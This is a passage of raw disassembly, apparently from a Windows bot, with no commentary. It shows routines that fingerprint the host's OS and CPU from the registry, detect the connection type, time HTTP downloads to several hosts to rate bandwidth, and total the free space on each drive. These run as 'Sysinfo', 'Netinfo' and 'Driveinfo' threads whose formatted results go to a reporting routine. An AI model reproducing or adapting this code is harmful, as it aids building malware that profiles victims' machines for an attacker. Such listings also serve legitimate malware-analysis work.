cmp [ebp+var_518], 1
jnz short loc_40859A
mov [ebp+var_48C], offset aXp ; "XP"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40859A: ; CODE XREF: sub_4083AD+1D6�j
; sub_4083AD+1DF�j
cmp [ebp+var_51C], 5
jnz short loc_4085B6
cmp [ebp+var_518], 2
jnz short loc_4085B6
mov [ebp+var_48C], offset a2003 ; "2003"
loc_4085B6: ; CODE XREF: sub_4083AD:loc_40851D�j
; sub_4083AD+191�j ...
cmp [ebp+var_510], 2
jnz short loc_4085D6
movsx eax, [ebp+var_50C]
test eax, eax
jz short loc_4085D6
lea eax, [ebp+var_50C]
mov [ebp+var_710], eax
loc_4085D6: ; CODE XREF: sub_4083AD+210�j
; sub_4083AD+21B�j
call sub_40435B
test eax, eax
jz short loc_4085EB
mov [ebp+var_744], offset aYes ; "Yes"
jmp short loc_4085F5
; ---------------------------------------------------------------------------
loc_4085EB: ; CODE XREF: sub_4083AD+230�j
mov [ebp+var_744], offset aNo ; "No"
loc_4085F5: ; CODE XREF: sub_4083AD+23C�j
mov eax, [ebp+var_744]
mov [ebp+var_4], eax
and [ebp+var_47C], 0
and [ebp+var_409], 0
xor eax, eax
cpuid
mov [ebp+var_488], ebx
mov [ebp+var_484], edx
mov [ebp+var_480], ecx
lea eax, [ebp+var_488]
mov [ebp+var_6EC], eax
and [ebp+var_70C], 0
lea eax, [ebp+var_70C]
push eax
push 20019h
push 0
push offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_4086B3
and [ebp+var_73C], 0
mov [ebp+var_740], 80h
lea eax, [ebp+var_740]
push eax
lea eax, [ebp+var_488]
push eax
lea eax, [ebp+var_73C]
push eax
push 0
push offset aProcessornames ; "ProcessorNameString"
push [ebp+var_70C]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jnz short loc_4086A7
push 1
push 1
lea eax, [ebp+var_488]
push eax
call sub_407C2C
add esp, 0Ch
loc_4086A7: ; CODE XREF: sub_4083AD+2E5�j
push [ebp+var_70C]
call ds:dword_417028 ; RegCloseKey
loc_4086B3: ; CODE XREF: sub_4083AD+2A8�j
cmp [ebp+var_6E4], 1
jnz short loc_4086C8
mov [ebp+var_748], offset byte_41DE30
jmp short loc_4086D2
; ---------------------------------------------------------------------------
loc_4086C8: ; CODE XREF: sub_4083AD+30D�j
mov [ebp+var_748], offset dword_4191F4
loc_4086D2: ; CODE XREF: sub_4083AD+319�j
cmp [ebp+var_524], 1
jnz short loc_4086E7
mov [ebp+var_74C], offset byte_41DE30
jmp short loc_4086F1
; ---------------------------------------------------------------------------
loc_4086E7: ; CODE XREF: sub_4083AD+32C�j
mov [ebp+var_74C], offset dword_4191F4
loc_4086F1: ; CODE XREF: sub_4083AD+338�j
cmp [ebp+var_6E8], 1
jnz short loc_408706
mov [ebp+var_750], offset byte_41DE30
jmp short loc_408710
; ---------------------------------------------------------------------------
loc_408706: ; CODE XREF: sub_4083AD+34B�j
mov [ebp+var_750], offset dword_4191F4
loc_408710: ; CODE XREF: sub_4083AD+357�j
lea eax, [ebp+var_708]
push eax
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_748]
push [ebp+var_6E4]
push [ebp+var_74C]
push [ebp+var_524]
push [ebp+var_750]
push [ebp+var_6E8]
push [ebp+var_4]
push [ebp+var_6F0]
push [ebp+var_738]
call sub_40821B
push eax
push [ebp+var_6EC]
push [ebp+var_514]
push [ebp+var_518]
push [ebp+var_51C]
push [ebp+var_710]
push [ebp+var_48C]
push offset dword_419104
push 400h
lea eax, [ebp+var_408]
push eax
call sub_416BAE ; _snprintf
add esp, 54h
lea eax, [ebp+var_408]
push eax
push offset dword_418B64
lea eax, [ebp+var_6C8]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_6CC]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_4083AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087C4 proc near ; CODE XREF: sub_40A9CF+1B9C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4087DE
jmp short locret_408806
; ---------------------------------------------------------------------------
loc_4087DE: ; CODE XREF: sub_4087C4+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aSysinfoThread ; "Sysinfo thread"
push 0
push [ebp+var_4]
push offset sub_4083AD
call sub_4095A4
add esp, 10h
locret_408806: ; CODE XREF: sub_4087C4+18�j
leave
retn
sub_4087C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408808 proc near ; CODE XREF: sub_408887+B�p
; sub_408887+19�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_0]
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push 7D0h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_28]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_4053B1
pop ecx
cmp [ebp+var_8], 0
jnz short loc_40885F
mov eax, 3E8h
jmp short locret_408885
; ---------------------------------------------------------------------------
loc_40885F: ; CODE XREF: sub_408808+4E�j
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, 3E8h
jnb short loc_40887B
call sub_416B64 ; clock
sub eax, [ebp+var_4]
mov [ebp+var_2C], eax
jmp short loc_408882
; ---------------------------------------------------------------------------
loc_40887B: ; CODE XREF: sub_408808+64�j
mov [ebp+var_2C], 3E8h
loc_408882: ; CODE XREF: sub_408808+71�j
mov eax, [ebp+var_2C]
locret_408885: ; CODE XREF: sub_408808+55�j
leave
retn
sub_408808 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408887 proc near ; CODE XREF: sub_408B30+1C2�p
; sub_40CA29+1E9�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset dword_418F60
call sub_408808
pop ecx
mov [ebp+var_4], eax
push offset loc_418F6C
call sub_408808
pop ecx
mov [ebp+var_8], eax
push offset dword_418F84
call sub_408808
pop ecx
mov [ebp+var_C], eax
push offset loc_418F90
call sub_408808
pop ecx
mov [ebp+var_10], eax
push offset dword_418FA0
call sub_408808
pop ecx
mov [ebp+var_14], eax
push offset dword_418FB0
call sub_408808
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
add eax, [ebp+var_C]
add eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_18]
xor edx, edx
push 6
pop ecx
div ecx
leave
retn
sub_408887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088FC proc near ; CODE XREF: sub_408B30:loc_408D33�p
var_438 = qword ptr -438h
var_430 = dword ptr -430h
var_42C = qword ptr -42Ch
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = byte ptr -308h
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 438h
and [ebp+var_8], 0
jmp short loc_408912
; ---------------------------------------------------------------------------
loc_40890B: ; CODE XREF: sub_4088FC+23�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408912: ; CODE XREF: sub_4088FC+D�j
mov eax, [ebp+var_8]
cmp off_418FC4[eax*4], 0
jz short loc_408921
jmp short loc_40890B
; ---------------------------------------------------------------------------
loc_408921: ; CODE XREF: sub_4088FC+21�j
mov eax, [ebp+var_8]
shr eax, 1
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_408936
; ---------------------------------------------------------------------------
loc_40892F: ; CODE XREF: sub_4088FC+D6�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_408936: ; CODE XREF: sub_4088FC+31�j
cmp [ebp+var_4], 3
jnb loc_408B2C
mov eax, [ebp+var_8]
dec eax
push eax
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_318], eax
mov eax, [ebp+var_318]
shl eax, 1
push off_418FC4[eax*4]
lea eax, [ebp+var_418]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_418]
push eax
call sub_4105FB
pop ecx
mov eax, [ebp+var_318]
shl eax, 1
push off_418FC8[eax*4]
lea eax, [ebp+var_308]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_308]
push eax
call sub_4105FB
pop ecx
push 2710h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_418]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_310], eax
cmp [ebp+var_310], 0
jnz short loc_4089D7
jmp loc_40892F
; ---------------------------------------------------------------------------
loc_4089D7: ; CODE XREF: sub_4088FC+D4�j
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_308]
push eax
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 200h
lea eax, [ebp+var_208]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_208]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_4053BF
add esp, 0Ch
and [ebp+var_314], 0
call sub_416B64 ; clock
mov [ebp+var_41C], eax
and [ebp+var_30C], 0
loc_408A3A: ; CODE XREF: sub_4088FC+1AF�j
; sub_4088FC+22B�j
push 1388h
push 200h
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_408A93
cmp [ebp+var_420], 0FFFFFFFFh
jz short loc_408A93
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
cmp eax, 1388h
jnb short loc_408A93
cmp [ebp+var_30C], 100000h
jb loc_408B15
loc_408A93: ; CODE XREF: sub_4088FC+16A�j
; sub_4088FC+173�j ...
cmp [ebp+var_30C], 2000h
jnb short loc_408AAD
push [ebp+var_310]
call sub_40538D
pop ecx
jmp short loc_408A3A
; ---------------------------------------------------------------------------
loc_408AAD: ; CODE XREF: sub_4088FC+1A1�j
mov eax, [ebp+var_30C]
mov dword ptr [ebp+var_42C], eax
and dword ptr [ebp+var_42C+4], 0
fild [ebp+var_42C]
fstp [ebp+var_430]
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
mov dword ptr [ebp+var_438], eax
and dword ptr [ebp+var_438+4], 0
fild [ebp+var_438]
fdiv ds:flt_417270
fdivr [ebp+var_430]
call sub_416CF8 ; _ftol
mov [ebp+var_424], eax
push [ebp+var_310]
call sub_40538D
pop ecx
mov eax, [ebp+var_424]
jmp short locret_408B2E
; ---------------------------------------------------------------------------
loc_408B15: ; CODE XREF: sub_4088FC+191�j
mov eax, [ebp+var_30C]
add eax, [ebp+var_420]
mov [ebp+var_30C], eax
jmp loc_408A3A
; ---------------------------------------------------------------------------
loc_408B2C: ; CODE XREF: sub_4088FC+3E�j
xor eax, eax
locret_408B2E: ; CODE XREF: sub_4088FC+217�j
leave
retn
sub_4088FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B30 proc near ; DATA XREF: sub_408E4A+35�o
var_A9C = qword ptr -0A9Ch
var_A7C = qword ptr -0A7Ch
var_A74 = dword ptr -0A74h
var_A70 = dword ptr -0A70h
var_A6C = dword ptr -0A6Ch
var_A68 = dword ptr -0A68h
var_A64 = dword ptr -0A64h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_8B8 = dword ptr -8B8h
var_8B4 = dword ptr -8B4h
var_8B0 = byte ptr -8B0h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A7Ch
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_A60]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset dword_41EF48
lea eax, [ebp+var_414]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_824]
push eax
push 0
push 0
push offset dword_41EF48
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz short loc_408BBC
push 1
push 0
push 0
push 401h
lea eax, [ebp+var_414]
push eax
mov eax, [ebp+var_824]
push dword ptr [eax+10h]
mov eax, [ebp+var_824]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
push [ebp+var_824]
call dword_41DE8C ; freeaddrinfo
loc_408BBC: ; CODE XREF: sub_408B30+54�j
call sub_409318
mov [ebp+var_8B8], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_830], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_820], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_82C], eax
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_8B0]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp dword_41DE7C, 0
jz short loc_408C9F
push 0
push 80h
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_818]
push eax
call dword_41DE7C ; InternetGetConnectedStateEx
test eax, eax
jz short loc_408C9F
mov eax, [ebp+var_818]
and eax, 1
test eax, eax
jz short loc_408C8F
push offset aModem ; "Modem"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_408C9F
; ---------------------------------------------------------------------------
loc_408C8F: ; CODE XREF: sub_408B30+14B�j
push offset aLan ; "LAN"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408C9F: ; CODE XREF: sub_408B30+11F�j
; sub_408B30+13E�j ...
call sub_4043E9
test eax, eax
jz short loc_408CB4
mov [ebp+var_A64], offset aYes ; "Yes"
jmp short loc_408CBE
; ---------------------------------------------------------------------------
loc_408CB4: ; CODE XREF: sub_408B30+176�j
mov [ebp+var_A64], offset aNo ; "No"
loc_408CBE: ; CODE XREF: sub_408B30+182�j
mov eax, [ebp+var_A64]
mov [ebp+var_8], eax
call sub_404279
test eax, eax
jz short loc_408CDC
mov [ebp+var_A68], offset aYes ; "Yes"
jmp short loc_408CE6
; ---------------------------------------------------------------------------
loc_408CDC: ; CODE XREF: sub_408B30+19E�j
mov [ebp+var_A68], offset aNo ; "No"
loc_408CE6: ; CODE XREF: sub_408B30+1AA�j
mov eax, [ebp+var_A68]
mov [ebp+var_8B4], eax
call sub_408887
mov [ebp+var_828], eax
mov [ebp+var_81C], offset aBad ; "Bad"
cmp [ebp+var_828], 2EEh
jnb short loc_408D1D
mov [ebp+var_81C], offset aAvarage ; "Avarage"
loc_408D1D: ; CODE XREF: sub_408B30+1E1�j
cmp [ebp+var_828], 1F4h
jnb short loc_408D33
mov [ebp+var_81C], offset aGood ; "Good"
loc_408D33: ; CODE XREF: sub_408B30+1F7�j
call sub_4088FC
mov [ebp+var_4], eax
cmp [ebp+var_82C], 1
jnz short loc_408D50
mov [ebp+var_A6C], offset byte_41DE30
jmp short loc_408D5A
; ---------------------------------------------------------------------------
loc_408D50: ; CODE XREF: sub_408B30+212�j
mov [ebp+var_A6C], offset dword_4191F4
loc_408D5A: ; CODE XREF: sub_408B30+21E�j
cmp [ebp+var_820], 1
jnz short loc_408D6F
mov [ebp+var_A70], offset byte_41DE30
jmp short loc_408D79
; ---------------------------------------------------------------------------
loc_408D6F: ; CODE XREF: sub_408B30+231�j
mov [ebp+var_A70], offset dword_4191F4
loc_408D79: ; CODE XREF: sub_408B30+23D�j
cmp [ebp+var_830], 1
jnz short loc_408D8E
mov [ebp+var_A74], offset byte_41DE30
jmp short loc_408D98
; ---------------------------------------------------------------------------
loc_408D8E: ; CODE XREF: sub_408B30+250�j
mov [ebp+var_A74], offset dword_4191F4
loc_408D98: ; CODE XREF: sub_408B30+25C�j
push [ebp+var_A6C]
push [ebp+var_82C]
push [ebp+var_A70]
push [ebp+var_820]
push [ebp+var_A74]
push [ebp+var_830]
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_A7C], eax
and dword ptr [ebp+var_A7C+4], 0
fild [ebp+var_A7C]
fdiv ds:flt_417274
push ecx
push ecx
fstp [esp+0A9Ch+var_A9C]
push [ebp+var_828]
push [ebp+var_81C]
push [ebp+var_8B4]
push [ebp+var_8]
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_414]
push eax
push offset dword_419284
push 400h
lea eax, [ebp+var_814]
push eax
call sub_416BAE ; _snprintf
add esp, 48h
lea eax, [ebp+var_814]
push eax
push offset dword_418B64
lea eax, [ebp+var_A5C]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_A60]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_408B30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E4A proc near ; CODE XREF: sub_40A9CF+1BD8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_408E64
jmp short locret_408E8C
; ---------------------------------------------------------------------------
loc_408E64: ; CODE XREF: sub_408E4A+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aNetinfoThread ; "Netinfo thread"
push 0
push [ebp+var_4]
push offset sub_408B30
call sub_4095A4
add esp, 10h
locret_408E8C: ; CODE XREF: sub_408E4A+18�j
leave
retn
sub_408E4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E8E proc near ; CODE XREF: sub_40CA29+1C5�p
; sub_40CA29+2DA�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_419398
mov [ebp+var_1C], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408EA4: ; CODE XREF: sub_408E8E+95�j
lea eax, [ebp+var_1C]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_408F14
cmp [ebp+var_10], 1
jz short loc_408F14
cmp [ebp+var_10], 5
jz short loc_408EE1
cmp [ebp+var_10], 2
jz short loc_408EE1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_408EF1
; ---------------------------------------------------------------------------
loc_408EE1: ; CODE XREF: sub_408E8E+33�j
; sub_408E8E+39�j
push 8
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_408EF1: ; CODE XREF: sub_408E8E+51�j
push 0
push 100000h
push [ebp+var_20]
push [ebp+var_24]
call sub_416C90
mov [ebp+var_24], eax
mov [ebp+var_20], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_408F14: ; CODE XREF: sub_408E8E+27�j
; sub_408E8E+2D�j
mov al, byte ptr [ebp+var_1C]
add al, 1
mov byte ptr [ebp+var_1C], al
movsx eax, byte ptr [ebp+var_1C]
cmp eax, 5Ah
jnz loc_408EA4
mov eax, [ebp+var_C]
leave
retn
sub_408E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F2E proc near ; DATA XREF: sub_4091E2+35�o
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = byte ptr -420h
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_404 = byte ptr -404h
var_3EF = byte ptr -3EFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5DCh
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5D4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 5
pop ecx
mov esi, offset aDriveInformati ; "Drive information - "
lea edi, [ebp+var_404]
rep movsd
movsb
mov ecx, 0FAh
xor eax, eax
lea edi, [ebp+var_3EF]
rep stosd
stosw
stosb
mov eax, dword_419398
mov [ebp+var_424], eax
and [ebp+var_418], 0
and [ebp+var_5D8], 0
and [ebp+var_414], 0
mov [ebp+var_410], 1
loc_408FA6: ; CODE XREF: sub_408F2E+23B�j
lea eax, [ebp+var_424]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_5DC], eax
cmp [ebp+var_5DC], 0
jz loc_409151
cmp [ebp+var_5DC], 1
jz loc_409151
cmp [ebp+var_5DC], 2
jnz short loc_408FE5
mov [ebp+var_4], offset aRemovable ; "removable"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FE5: ; CODE XREF: sub_408F2E+AC�j
cmp [ebp+var_5DC], 3
jnz short loc_408FF7
mov [ebp+var_4], offset aFixed ; "fixed"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FF7: ; CODE XREF: sub_408F2E+BE�j
cmp [ebp+var_5DC], 4
jnz short loc_409009
mov [ebp+var_4], offset aRemote ; "remote"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_409009: ; CODE XREF: sub_408F2E+D0�j
cmp [ebp+var_5DC], 5
jnz short loc_40901B
mov [ebp+var_4], offset aCdRom ; "cd-rom"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40901B: ; CODE XREF: sub_408F2E+E2�j
cmp [ebp+var_5DC], 6
jnz short loc_40902D
mov [ebp+var_4], offset aRamdisk ; "ramdisk"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40902D: ; CODE XREF: sub_408F2E+F4�j
mov [ebp+var_4], offset aUnknown ; "unknown"
loc_409034: ; CODE XREF: sub_408F2E+B5�j
; sub_408F2E+C7�j ...
cmp [ebp+var_5DC], 5
jz short loc_40906A
cmp [ebp+var_5DC], 2
jz short loc_40906A
lea eax, [ebp+var_42C]
push eax
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_40C]
push eax
lea eax, [ebp+var_424]
push eax
call ds:dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_40907D
; ---------------------------------------------------------------------------
loc_40906A: ; CODE XREF: sub_408F2E+10D�j
; sub_408F2E+116�j
push 8
push 0
lea eax, [ebp+var_42C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_40907D: ; CODE XREF: sub_408F2E+13A�j
push 0
push 100000h
push [ebp+var_428]
push [ebp+var_42C]
call sub_416C90
mov [ebp+var_42C], eax
mov [ebp+var_428], edx
cmp [ebp+var_410], 0
jnz short loc_4090BF
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
jmp short loc_4090C6
; ---------------------------------------------------------------------------
loc_4090BF: ; CODE XREF: sub_408F2E+17A�j
and [ebp+var_410], 0
loc_4090C6: ; CODE XREF: sub_408F2E+18F�j
mov eax, [ebp+var_42C]
or eax, [ebp+var_428]
test eax, eax
jz short loc_40910A
push [ebp+var_428]
push [ebp+var_42C]
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193E4
lea eax, [ebp+var_404]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 1Ch
jmp short loc_409130
; ---------------------------------------------------------------------------
loc_40910A: ; CODE XREF: sub_408F2E+1A6�j
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193D4
lea eax, [ebp+var_404]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 14h
loc_409130: ; CODE XREF: sub_408F2E+1DA�j
mov eax, [ebp+var_42C]
mov ecx, [ebp+var_414]
add ecx, eax
mov [ebp+var_414], ecx
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_409151: ; CODE XREF: sub_408F2E+92�j
; sub_408F2E+9F�j
mov al, byte ptr [ebp+var_424]
add al, 1
mov byte ptr [ebp+var_424], al
movsx eax, byte ptr [ebp+var_424]
cmp eax, 5Ah
jnz loc_408FA6
cmp [ebp+var_5D8], 0
jz short loc_40918B
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40918B: ; CODE XREF: sub_408F2E+248�j
push [ebp+var_414]
push [ebp+var_5D8]
lea eax, [ebp+var_404]
push eax
push offset dword_41939C
lea eax, [ebp+var_404]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_404]
push eax
push offset dword_418B64
lea eax, [ebp+var_5D0]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5D4]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
leave
retn 4
sub_408F2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4091E2 proc near ; CODE XREF: sub_40A9CF+1C61�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4091FC
jmp short locret_409224
; ---------------------------------------------------------------------------
loc_4091FC: ; CODE XREF: sub_4091E2+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aDriveinfoThrea ; "Driveinfo thread"
push 0
push [ebp+var_4]
push offset sub_408F2E
call sub_4095A4
add esp, 10h
locret_409224: ; CODE XREF: sub_4091E2+18�j
leave
retn
sub_4091E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409226 proc near ; CODE XREF: sub_4167F1+215�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call ds:dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_40928E
jg short loc_40924E
cmp [ebp+var_8], 0
jbe short loc_40928E
loc_40924E: ; CODE XREF: sub_409226+20�j
cmp [ebp+var_C], 0
jl short loc_40928E
jg short loc_40925C
cmp [ebp+var_10], 0
jbe short loc_40928E
loc_40925C: ; CODE XREF: sub_409226+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
mov dword_41E2D0, eax
jmp short locret_4092A2
; ---------------------------------------------------------------------------
loc_40928E: ; CODE XREF: sub_409226+1E�j
; sub_409226+26�j ...
call ds:dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_41E2D0, eax
locret_4092A2: ; CODE XREF: sub_409226+66�j
leave
retn
sub_409226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4092A4 proc near ; CODE XREF: sub_4083AD+61�p
; sub_40A9CF+1CCA�p ...
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call ds:dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
